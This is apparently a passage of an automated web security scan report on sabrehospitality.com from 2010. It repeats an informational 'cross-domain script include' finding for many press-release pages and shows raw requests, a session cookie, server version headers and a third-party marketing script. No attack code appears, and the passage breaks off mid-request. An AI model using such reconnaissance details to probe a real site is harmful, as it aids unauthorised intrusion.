Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22122


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.26. http://www.sabrehospitality.com/press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23013


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.27. http://www.sabrehospitality.com/press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22763


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.28. http://www.sabrehospitality.com/press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23436


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.29. http://www.sabrehospitality.com/press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:51:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24391


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.30. http://www.sabrehospitality.com/press/hacienda-tres-ros-launches-innovative-mobile-booking-engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/hacienda-tres-ros-launches-innovative-mobile-booking-engine

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/hacienda-tres-ros-launches-innovative-mobile-booking-engine HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:27:37 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19842


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.31. http://www.sabrehospitality.com/press/increased-online-conversion-rates-lead-to-big-success-for-aqua-hotels-resorts-after-switching-to-sabre-hospitality-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/increased-online-conversion-rates-lead-to-big-success-for-aqua-hotels-resorts-after-switching-to-sabre-hospitality-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/increased-online-conversion-rates-lead-to-big-success-for-aqua-hotels-resorts-after-switching-to-sabre-hospitality-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/subscribe.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:32:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22142


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.32. http://www.sabrehospitality.com/press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:51:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22972


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.33. http://www.sabrehospitality.com/press/mvenpick-hotels-resorts-sets-on-new-booking-engine-guest-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/mvenpick-hotels-resorts-sets-on-new-booking-engine-guest-connect

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/mvenpick-hotels-resorts-sets-on-new-booking-engine-guest-connect HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:37:10 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21927


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.34. http://www.sabrehospitality.com/press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:26:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24103


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.35. http://www.sabrehospitality.com/press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009 HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:37:58 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24543


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.36. http://www.sabrehospitality.com/press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:06:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24571


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.37. http://www.sabrehospitality.com/press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:49:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23719


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.38. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:35:20 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23539


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.39. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:34:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22357


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.40. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-helps-mamaison-hotels-and-residences-increase-online-booking-revenue-by-more-than-100-percent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-helps-mamaison-hotels-and-residences-increase-online-booking-revenue-by-more-than-100-percent

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/sabre-hospitality-solutions-helps-mamaison-hotels-and-residences-increase-online-booking-revenue-by-more-than-100-percent HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/subscribe.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:30:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22028


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.41. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:04:11 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27962


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.42. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:39:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20679


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.43. http://www.sabrehospitality.com/press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:26:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22930


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.44. http://www.sabrehospitality.com/press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
